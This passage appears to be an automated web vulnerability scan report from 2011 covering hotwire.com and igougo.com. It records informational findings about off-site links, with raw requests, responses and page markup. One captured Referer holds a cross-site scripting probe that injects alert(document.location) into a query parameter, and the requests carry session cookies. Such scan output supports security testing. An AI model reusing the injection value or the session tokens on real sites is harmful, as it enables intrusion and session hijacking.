<img src="http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999" alt="We'll email you when this price drops" width="178" height="61"/>
<p>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png?ver=222337" alt="Watch this trip"/></button>
...[SNIP]...
<div class="center">
<img class="waiting" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/loading-animation.gif?ver=158026"
width="66" height="65" border="0" alt="...waiting..." />
<br/>
<img class="message" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/updating_animation_narrow.gif?ver=158026"
width="91" height="16" border="0" alt="Updating..." />

</div>
...[SNIP]...
<span class="imgAlign"><img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/> </span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif?ver=222337" alt="Book now"/></button>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;Holiday Inn
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;DoubleTree
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;Hilton Garden Inn
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;and other respected hotel brands
</li>
...[SNIP]...
<h3 class="header">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg?ver=222796" alt=""
width="61" height="42">

<span>
...[SNIP]...
r-cross-sell', linkName:'see-more-car-types'});
CompSupport.callJsObj(this, 'refresh', ['54']);
return false;
">
<img src="http://ak-static.hotwirestatic.com/static/images/buttons/forward-arrow-red.gif?ver=222337"
alt="" width="23" height="23">

<span>
...[SNIP]...
<div class="logo fRt fnt15">

<a href="http://www.tripadvisor.com" target="_blank"><img
src="http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif"
width="107" height="19" alt="TripAdvisor logo" border="0"/>
</a>
...[SNIP]...
<div class="panControls" id="_pan">
<img src="http://ak-static.hotwirestatic.com/static/images/core/map/pan_arrow.png?ver=209098" width="39" height="39" border="0"
usemap="#_areaMap" alt="">

<map name="_areaMap" id="_areaMap">
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif?ver=185464' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif?ver=146387' />

</div>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif?ver=222337" alt="Book now"/></button>
...[SNIP]...
<a href="#" onclick="return CompSupport.getJsObj(this).openFeedbackForm(this);">
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/balloon-icon.gif?ver=156461" alt=""/>
<strong>
...[SNIP]...
</strong>
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/pop-up-icon.gif?ver=156461" alt="" class="pop-up-icon">
</a>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest3'});"
target="_new">

<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest3'});"
target="_new">

<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>

<span class="staticMessage">
...[SNIP]...
<li><a href="http://www.advertising.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-FOOTER:loc:0:ADVERTISERS',
'external-link','http://www.advertising.expedia.com', AnalyticsSupport.pageId)">
Advertisers</a>
...[SNIP]...
</a> -
<a target="_blank" href="http://www.carrentals.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CARRENTALS',
'external-link','http://www.carrentals.com', AnalyticsSupport.pageId);">
CarRentals.com</a> -
<a target="_blank" href="http://www.travel-ticker.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRAVEL-TICKER',
'external-link','http://www.travel-ticker.com', AnalyticsSupport.pageId);">
Travel-Ticker.com</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EXPEDIA',
'external-link','http://www.expedia.com', AnalyticsSupport.pageId);">
Expedia</a> -
<a target="_blank" href="http://www.hotels.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:HOTELS',
'external-link','http://www.hotels.com', AnalyticsSupport.pageId);">
Hotels.com</a> -
<a target="_blank" href="http://www.classicvacations.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CLASSIC',
'external-link','http://www.classicvacations.com', AnalyticsSupport.pageId);">
ClassicVacations.com</a> -
<a target="_blank" href="http://www.tripadvisor.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRIPADVISOR',
'external-link','http://www.tripadvisor.com', AnalyticsSupport.pageId);">
TripAdvisor.com</a> -
<a target="_blank" href="http://www.smartertravel.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SMARTER-TVL',
'external-link','http://www.smartertravel.com', AnalyticsSupport.pageId);">
Smarter Travel</a> -
<a target="_blank" href="http://www.egencia.com/" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EGENCIA',
'external-link','http://www.egencia.com/', AnalyticsSupport.pageId);">
Egencia</a>
...[SNIP]...
<strong><a target="_blank" href="http://iac.com/index.html"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:IAC',
'external-link','http://iac.com/index.html', AnalyticsSupport.pageId);">
IAC/InterActiveCorp</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.bloglines.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:BLOGLINES',
'external-link','http://www.bloglines.com', AnalyticsSupport.pageId);">
Bloglines</a> -
<a target="_blank" href="http://www.citysearch.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CITY-SEARCH',
'external-link','http://www.citysearch.com', AnalyticsSupport.pageId);">
Citysearch</a> -
<a target="_blank" href="http://www.evite.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EVITE',
'external-link','http://www.evite.com', AnalyticsSupport.pageId);">
Evite</a> -
<a target="_blank" href="http://www.gifts.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:GIFTS',
'external-link','http://www.gifts.com', AnalyticsSupport.pageId);">
Gifts</a> -
<a target="_blank" href="http://www.lendingtree.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:LENDING-TREE',
'external-link','http://www.lendingtree.com/', AnalyticsSupport.pageId);">
LendingTree</a> -
<a target="_blank" href="http://www.match.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:MATCH','external-link',
'http://www.match.com', AnalyticsSupport.pageId);">
Match</a> -
<a target="_blank" href="http://www.hsn.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:ONLINE-SHOPPING',
'external-link','http://www.hsn.com', AnalyticsSupport.pageId);">
Online Shopping</a> -
<a target="_blank" href="http://www.pronto.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:PRONTO',
'external-link','http://www.pronto.com', AnalyticsSupport.pageId);">
Pronto</a> -
<a target="_blank" href="http://www.servicemagic.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SERVICEMAGIC',
'external-link','http://www.servicemagic.com', AnalyticsSupport.pageId);">
ServiceMagic</a> -
<a target="_blank" href="http://www.shoebuy.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SHOES','external-link',
'http://www.shoebuy.com', AnalyticsSupport.pageId);">
Shoebuy</a> -
<a target="_blank" href="http://www.thedailybeast.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:THE-DAILY-BEAST',
'external-link','http://www.thedailybeast.com', AnalyticsSupport.pageId);">
The Daily Beast</a>
...[SNIP]...
<div class="yui3-u rightInfo">
<img class="mr10" src="http://ak-static.hotwirestatic.com/static/images/shell/BBB_logo_A.jpg?ver=222960" width="135" height="53" border="0" alt="BBB Acredited Business"/>
<a target="_blank" href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--27352.html"><img class="bizrate"
src="http://ak-static.hotwirestatic.com/static/images/shell/bizrate_27352_medal_sm.gif?ver=222960" width="112" height="37" border="0" alt="Bizrate Registered Store"/>
</a>
...[SNIP]...
, strikes, natural disasters and bad weather. Trip Protection does not offer coverage for change of plans due to non-emergency situations. You can purchase Trip Protection up until your check-in date. <a href="http://www.etravelprotection.com/servlet/WASCPure?accam=F028548" onclick="AppSupport.popUpWindow(this,'accessAmerica','height=650,width=700,left=0,top=0,toolbar=yes,status=yes,scrollbars=yes,location=yes,menubar=yes,directories=yes,resizable=yes');return false;" class="popUp"><strong>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-update-results.png?ver=222337" alt="Submit"/></button>
...[SNIP]...

19.204. http://www.hotwire.com/hotel/results.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=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; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34JgBIItf8EEvK/oj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
ngsv02.html" l gen true for "http://www.hotwire.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.hotwire.com" r (n 0 s 0 v 0 l 0))' />


<link rel="shortcut icon" href="http://ak-static.hotwirestatic.com/static/images/favicon2.ico?ver=207657"/>
<link rel="stylesheet" type="text/css" href="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.css?ver=216778"/>


<script>
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>


<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/??css/purchasePath-sprite.css,css/results-sprite.css,css/hotels-sprite.css,css/hotelResults-sprite.css,css/tripWatcherLayout.css,ver=221726" type="text/css"/>

<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/results/hotelResultsPrint.css?ver=209738" media="print" type="text/css"/>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/??javascript/core/HwStateSupport.js,javascript/hotel/SidebarFilterComp.js,ver=182672"></script>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest3'});"
target="_new">

<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest3'});"
target="_new">

<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>

<span class="staticMessage">
...[SNIP]...
<a href="http://www.hotwire.com/index.jsp" onclick="AnalyticsSupport.storeLinkId({moduleName:'NAV-LOGO',linkName:'HOTWIRE'});"><img src="http://ak-static.hotwirestatic.com/static/images/shell/hotwire-logo-3d.gif?ver=222960" width="165" height="33" border="0" alt="Hotwire.com Home"/></a>
...[SNIP]...
href="#" title="Help"
onclick="CompSupport.callJsObj('currencyHelpLayer', 'show', this); AnalyticsSupport.logOmnitureLinkEvent({moduleName:'curr-help', link: 'help1'}); return false;">
<img class='iconNormal' src='http://ak-static.hotwirestatic.com/static/images/global/icon-whats-this.gif?ver=193627' alt="Help"/>
</a>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="Go"/></button>
...[SNIP]...
</div>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/javascript/core/HwValidatorSupport.js?ver=177334"></script>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/core/buttons/btn-search.gif?ver=217676" alt="Find a hotel"/></button>
...[SNIP]...
<label>
<img src='http://ak-static.hotwirestatic.com/static/images/core/farefinder/gray.flighticon.gif?ver=215943' width='12' height='12' border='0'/>
Logan Intl Ai...
(1.0 - 7.5 miles)
<div class="clr">
...[SNIP]...
<div class="panControls" id="_pan">
<img src="http://ak-static.hotwirestatic.com/static/images/core/map/pan_arrow.png?ver=209098" width="39" height="39" border="0"
usemap="#_areaMap" alt="">

<map name="_areaMap" id="_areaMap">
...[SNIP]...
</span>
&#160;
<img src="http://ak-static.hotwirestatic.com/static/images/map-console/trip_advisor_logo.png?ver=190782" alt="TripAdvisor" />
<p>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/global/buttons/btn-yes-update-results.png?ver=205501" alt="yes"/></button>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/global/buttons/btn-no-thanks.png?ver=205501" alt="no"/></button>
...[SNIP]...
</em>"
class="nowrap">
<img src='http://ak-static.hotwirestatic.com/static/images/core/farefinder/gray.flighticon.gif?ver=215943' width='12' height='12' border='0'/>Logan Intl Airport BO&#133;
7.5 mi
</span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="go"/></button>
...[SNIP]...
<div class="center">
<img class="waiting" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/loading-animation.gif?ver=158026"
width="66" height="65" border="0" alt="...waiting..." />
<br/>
<img class="message" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/updating_animation_narrow.gif?ver=158026"
width="91" height="16" border="0" alt="Updating..." />

</div>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="Go"/></button>
...[SNIP]...
<a href="#"
onclick="return CompSupport.callJsObj(this, 'onSearchSubmit');return false;"><img
src="http://ak-static.hotwirestatic.com/static/images/buttons/forward-arrow-red.gif?ver=222337"
alt="compare">
Compare</a>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-update-results.png?ver=222337" alt="Submit"/></button>
...[SNIP]...
<a href="#" onclick="return CompSupport.getJsObj(this).openFeedbackForm(this);">
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/balloon-icon.gif?ver=156461" alt=""/>
<strong>
...[SNIP]...
</strong>
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/pop-up-icon.gif?ver=156461" alt="" class="pop-up-icon">
</a>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest4'});"
target="_new">

<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest4'});"
target="_new">

<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>

<span class="staticMessage">
...[SNIP]...
<li><a href="http://www.advertising.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-FOOTER:loc:0:ADVERTISERS',
'external-link','http://www.advertising.expedia.com', AnalyticsSupport.pageId)">
Advertisers</a>
...[SNIP]...
</a> -
<a target="_blank" href="http://www.carrentals.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CARRENTALS',
'external-link','http://www.carrentals.com', AnalyticsSupport.pageId);">
CarRentals.com</a> -
<a target="_blank" href="http://www.travel-ticker.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRAVEL-TICKER',
'external-link','http://www.travel-ticker.com', AnalyticsSupport.pageId);">
Travel-Ticker.com</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EXPEDIA',
'external-link','http://www.expedia.com', AnalyticsSupport.pageId);">
Expedia</a> -
<a target="_blank" href="http://www.hotels.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:HOTELS',
'external-link','http://www.hotels.com', AnalyticsSupport.pageId);">
Hotels.com</a> -
<a target="_blank" href="http://www.classicvacations.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CLASSIC',
'external-link','http://www.classicvacations.com', AnalyticsSupport.pageId);">
ClassicVacations.com</a> -
<a target="_blank" href="http://www.tripadvisor.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRIPADVISOR',
'external-link','http://www.tripadvisor.com', AnalyticsSupport.pageId);">
TripAdvisor.com</a> -
<a target="_blank" href="http://www.smartertravel.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SMARTER-TVL',
'external-link','http://www.smartertravel.com', AnalyticsSupport.pageId);">
Smarter Travel</a> -
<a target="_blank" href="http://www.egencia.com/" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EGENCIA',
'external-link','http://www.egencia.com/', AnalyticsSupport.pageId);">
Egencia</a>
...[SNIP]...
<strong><a target="_blank" href="http://iac.com/index.html"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:IAC',
'external-link','http://iac.com/index.html', AnalyticsSupport.pageId);">
IAC/InterActiveCorp</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.bloglines.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:BLOGLINES',
'external-link','http://www.bloglines.com', AnalyticsSupport.pageId);">
Bloglines</a> -
<a target="_blank" href="http://www.citysearch.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CITY-SEARCH',
'external-link','http://www.citysearch.com', AnalyticsSupport.pageId);">
Citysearch</a> -
<a target="_blank" href="http://www.evite.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EVITE',
'external-link','http://www.evite.com', AnalyticsSupport.pageId);">
Evite</a> -
<a target="_blank" href="http://www.gifts.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:GIFTS',
'external-link','http://www.gifts.com', AnalyticsSupport.pageId);">
Gifts</a> -
<a target="_blank" href="http://www.lendingtree.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:LENDING-TREE',
'external-link','http://www.lendingtree.com/', AnalyticsSupport.pageId);">
LendingTree</a> -
<a target="_blank" href="http://www.match.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:MATCH','external-link',
'http://www.match.com', AnalyticsSupport.pageId);">
Match</a> -
<a target="_blank" href="http://www.hsn.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:ONLINE-SHOPPING',
'external-link','http://www.hsn.com', AnalyticsSupport.pageId);">
Online Shopping</a> -
<a target="_blank" href="http://www.pronto.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:PRONTO',
'external-link','http://www.pronto.com', AnalyticsSupport.pageId);">
Pronto</a> -
<a target="_blank" href="http://www.servicemagic.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SERVICEMAGIC',
'external-link','http://www.servicemagic.com', AnalyticsSupport.pageId);">
ServiceMagic</a> -
<a target="_blank" href="http://www.shoebuy.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SHOES','external-link',
'http://www.shoebuy.com', AnalyticsSupport.pageId);">
Shoebuy</a> -
<a target="_blank" href="http://www.thedailybeast.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:THE-DAILY-BEAST',
'external-link','http://www.thedailybeast.com', AnalyticsSupport.pageId);">
The Daily Beast</a>
...[SNIP]...
<div class="yui3-u rightInfo">
<img class="mr10" src="http://ak-static.hotwirestatic.com/static/images/shell/BBB_logo_A.jpg?ver=222960" width="135" height="53" border="0" alt="BBB Acredited Business"/>
<a target="_blank" href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--27352.html"><img class="bizrate"
src="http://ak-static.hotwirestatic.com/static/images/shell/bizrate_27352_medal_sm.gif?ver=222960" width="112" height="37" border="0" alt="Bizrate Registered Store"/>
</a>
...[SNIP]...

19.205. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-4; mbox=session#1317601622475-177474#1317604984|PC#1317601622475-177474.19#1318812724|check#true#1317603184; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36801


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
